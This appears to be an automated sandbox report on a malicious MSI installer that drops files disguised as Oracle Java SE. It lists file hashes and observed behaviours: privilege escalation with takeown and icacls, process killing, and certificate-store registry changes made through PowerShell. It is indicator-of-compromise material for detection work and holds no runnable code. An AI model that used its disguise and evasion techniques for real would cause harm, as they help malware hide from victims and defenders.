C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 efa9512f93d3510e0a618b0bb8521f4d
SHA1 3dc78f8aed67b3378fd650afd1f2f95965018e5a
SHA256 832d55d9e43a89da771b08be5419a967ff5ed8d1ca5601ec5e89dfba04af6e27
SHA512 3ea622ab40bb73beca8459614626f701c286624bb691c804dab18f458c4f6f2275fa452e447c3f340d3622e719a706fe029d17a5a0621675a77a5afff4f9409f

C:\Windows\Installer\MSI955A.tmp

MD5 a3ae5d86ecf38db9427359ea37a5f646
SHA1 eb4cb5ff520717038adadcc5e1ef8f7c24b27a90
SHA256 c8d190d5be1efd2d52f72a72ae9dfa3940ab3faceb626405959349654fe18b74
SHA512 96ecb3bc00848eeb2836e289ef7b7b2607d30790ffd1ae0e0acfc2e14f26a991c6e728b8dc67280426e478c70231f9e13f514e52c8ce7d956c1fad0e322d98e0

\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

MD5 36b24a4deb93b2af6da9dba72eefaa5f
SHA1 8c55de3fa1269f4fdba9a5c701c5daad84d59f38
SHA256 d3370bb63c1908550c49601fcc664313809fcb68fdfdb81ef8129fe465a254d2
SHA512 572355b5ab4fd349c71aaf66d5a1232e48ee697bb96b84b6656dc6b6c64f7c8098e00772e1b519805bb441159281ec5f90ff91a20ed17597704bf2492f8fff9d

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\MSVCP140.dll

MD5 9dda681b0406c3575e666f52cbde4f80
SHA1 1951c5b2c689534cdc2fbfbc14abbf9600a66086
SHA256 1ecd899f18b58a7915069e17582b8bf9f491a907c3fdf22b1ba1cbb2727b69b3
SHA512 753d0af201d5c91b50e7d1ed54f44ee3c336f8124ba7a5e86b53836df520eb2733b725b877f83fda6a9a7768379b5f6fafa0bd3890766b4188ebd337272e9512

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140.dll

MD5 e008fbfdea1bf873f3d94d74c1cf7935
SHA1 2a2af5e9084e7b55cdd5d01df342b02c1917573c
SHA256 678f9d715220512a823ca45d7e8545a1288728d8d47243e072e17049441cdd2b
SHA512 145acb67ab06dc90e5c7ed89623a339f595998af683bf47d665ffa23b05f9b87016b3ae5777c2c45f53b91a757e510b0f5aa5a9b908d79df3d566b2307d9d3d0

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll

MD5 fb0ca6cbfff46be87ad729a1c4fde138
SHA1 2c302d1c535d5c40f31c3a75393118b40e1b2af9
SHA256 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df
SHA512 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll

MD5 c9a55de62e53d747c5a7fddedef874f9
SHA1 c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad
SHA256 b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b
SHA512 adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll

MD5 3f224766fe9b090333fdb43d5a22f9ea
SHA1 548d1bb707ae7a3dfccc0c2d99908561a305f57b
SHA256 ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357
SHA512 c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll

MD5 23bd405a6cfd1e38c74c5150eec28d0a
SHA1 1d3be98e7dfe565e297e837a7085731ecd368c7b
SHA256 a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41
SHA512 c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll

MD5 6e704280d632c2f8f2cadefcae25ad85
SHA1 699c5a1c553d64d7ff3cf4fe57da72bb151caede
SHA256 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893
SHA512 ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll

MD5 95c5b49af7f2c7d3cd0bc14b1e9efacb
SHA1 c400205c81140e60dffa8811c1906ce87c58971e
SHA256 ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1
SHA512 f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll

MD5 79ee4a2fcbe24e9a65106de834ccda4a
SHA1 fd1ba674371af7116ea06ad42886185f98ba137b
SHA256 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613
SHA512 6ef7857d856a1d23333669184a231ad402dc62c8f457a6305fe53ed5e792176ca6f9e561375a707da0d7dd27e6ea95f8c4355c5dc217e847e807000b310aa05c

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll

MD5 1776a2b85378b27825cf5e5a3a132d9a
SHA1 626f0e7f2f18f31ec304fe7a7af1a87cbbebb1df
SHA256 675b1b82dd485cc8c8a099272db9241d0d2a7f45424901f35231b79186ec47ee
SHA512 541a5dd997fc5fec31c17b4f95f03c3a52e106d6fb590cb46bdf5adad23ed4a895853768229f3fbb9049f614d9bae031e6c43cec43fb38c89f13163721bb8348

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll

MD5 ad99c2362f64cde7756b16f9a016a60f
SHA1 07c9a78ee658bfa81db61dab039cffc9145cc6cb
SHA256 73ab2161a7700835b2a15b7487045a695706cc18bcee283b114042570bb9c0aa
SHA512 9c72f239adda1de11b4ad7028f3c897c93859ef277658aeaa141f09b7ddfe788d657b9cb1e2648971ecd5d27b99166283110ccba437d461003dbb9f6885451f7

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll

MD5 d5166ab3034f0e1aa679bfa1907e5844
SHA1 851dd640cb34177c43b5f47b218a686c09fa6b4c
SHA256 7bcab4ca00fb1f85fea29dd3375f709317b984a6f3b9ba12b8cf1952f97beee5
SHA512 8f2d7442191de22457c1b8402faad594af2fe0c38280aaafc876c797ca79f7f4b6860e557e37c3dbe084fe7262a85c358e3eeaf91e16855a91b7535cb0ac832e

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll

MD5 9ddea3cc96e0fdd3443cc60d649931b3
SHA1 af3cb7036318a8427f20b8561079e279119dca0e
SHA256 b7c3ebc36c84630a52d23d1c0e79d61012dfa44cdebdf039af31ec9e322845a5
SHA512 1427193b31b64715f5712db9c431593bdc56ef512fe353147ddb7544c1c39ded4371cd72055d82818e965aff0441b7cbe0b811d828efb0ece28471716659e162

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll

MD5 1e109b1d40efcfec81a5d43d318cbb26
SHA1 03aae193dc36d70fb34257d1276666e988b4a222
SHA256 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69
SHA512 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll

MD5 034379bcea45eb99db8cdfeacbc5e281
SHA1 bbf93d82e7e306e827efeb9612e8eab2b760e2b7
SHA256 8b543b1bb241f5b773eb76f652dad7b12e3e4a09230f2e804cd6b0622e8baf65
SHA512 7ea6efb75b0c59d3120d5b13da139042726a06d105c924095ed252f39ac19e11e8a5c6bb1c45fa7519c0163716745d03fb9daaaca50139a115235ab2815cc256

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 228c6bbe1bce84315e4927392a3baee5
SHA1 ba274aa567ad1ec663a2f9284af2e3cb232698fb
SHA256 ac0cec8644340125507dd0bc9a90b1853a2d194eb60a049237fb5e752d349065
SHA512 37a60cce69e81f68ef62c58bba8f2843e99e8ba1b87df9a5b561d358309e672ae5e3434a10a3dde01ae624d1638da226d42c64316f72f3d63b08015b43c56cab

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll

MD5 9b79fda359a269c63dcac69b2c81caa4
SHA1 a38c81b7a2ec158dfcfeb72cb7c04b3eb3ccc0fb
SHA256 4d0f0ea6e8478132892f9e674e27e2bc346622fc8989c704e5b2299a18c1d138
SHA512 e69d275c5ec5eae5c95b0596f0cc681b7d287b3e2f9c78a9b5e658949e6244f754f96ad7d40214d22ed28d64e4e8bd507363cdf99999fea93cfe319078c1f541

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll

MD5 39325e5f023eb564c87d30f7e06dff23
SHA1 03dd79a7fbe3de1a29359b94ba2d554776bdd3fe
SHA256 56d8b7ee7619579a3c648eb130c9354ba1ba5b33a07a4f350370ee7b3653749a
SHA512 087b9dcb744ad7d330bacb9bda9c1a1df28ebb9327de0c5dc618e79929fd33d1b1ff0e1ef4c08f8b3ea8118b968a89f44fe651c66cba4ecbb3216cd4bcce3085

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll

MD5 8da414c3524a869e5679c0678d1640c1
SHA1 60cf28792c68e9894878c31b323e68feb4676865
SHA256 39723e61c98703034b264b97ee0fe12e696c6560483d799020f9847d8a952672
SHA512 6ef3f81206e7d4dca5b3c1fafc9aa2328b717e61ee0acce30dfb15ad0fe3cb59b2bd61f92bf6046c0aae01445896dcb1485ad8be86629d22c3301a1b5f4f2cfa

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll

MD5 70e9104e743069b573ca12a3cd87ec33
SHA1 4290755b6a49212b2e969200e7a088d1713b84a2
SHA256 7e6b33a4c0c84f18f2be294ec63212245af4fd8354636804ffe5ee9a0d526d95
SHA512 e979f28451d271f405b780fc2025707c8a29dcb4c28980ca42e33d4033666de0e4a4644defec6c1d5d4bdd3c73d405fafcffe3320c60134681f62805c965bfd9

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll

MD5 b3c188281aa3998f49391da0c3b52b8e
SHA1 67e6f1eb07861dddde3df9d266f683cb0331d433
SHA256 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46
SHA512 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll

MD5 888aa12cc20f645dd2fc04f52e453bc6
SHA1 b19e790c9e6ceface9cdd41a24518d6e4a953b23
SHA256 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb
SHA512 f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3

C:\Config.Msi\f778883.rbs

MD5 bc12acb03a9d902902e730ae9e7501a7
SHA1 4ad27465d54492a1c1beccddcb98bff93a279330
SHA256 338958c726a19c0176a5e6b0bfd6eb4ef55e368e73966889591e31f029355e1c
SHA512 33a68874d7a8c0165ba0eb8a04fb3b418e9af050964e44b513f1db4c134a686aca29aa6e8f84b6d638128be927f8d0e788ad94e8e1b96cccb11e8d5a1d8d2165

C:\Windows\Installer\f778881.msi

MD5 1d2fdd9c09c8452e9c88222f2c16806a
SHA1 5852958feca13943a937f638a0ea6cfb59307574
SHA256 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5
SHA512 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

MD5 96b62cfb83cf0e9790a3ef939173ee31
SHA1 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1
SHA256 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23
SHA512 d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll

MD5 2e68a858f54dda699080af452da69e39
SHA1 32a47540728cca729da3972f180c5c70042f0aca
SHA256 8c9889fad72842cd414738b8ef1915563d29e85e6defc1b147ea8864015a1d7b
SHA512 7754cbc50dd27553ca61206cb4cbe3ca36d3299ba31ce342ac293507cd445f68acec918602b35fb727132b9dd348c97575e21742c781a04cdceb22fea467851d

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll

MD5 e7fcab954f116c8bb4b006145c20dd23
SHA1 91ee70a33ab12618f0f0ec229de4583d9aa52a8a
SHA256 e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2
SHA512 d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9

memory/1248-220-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp

memory/1248-222-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-07 11:25

Reported

2024-10-07 11:28

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

152s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA74E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57a2e7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{B787FD59-D138-4CB1-8AF7-72A4E4815245} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA400.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA46F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA897.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57a2e7.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\e57a2e9.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
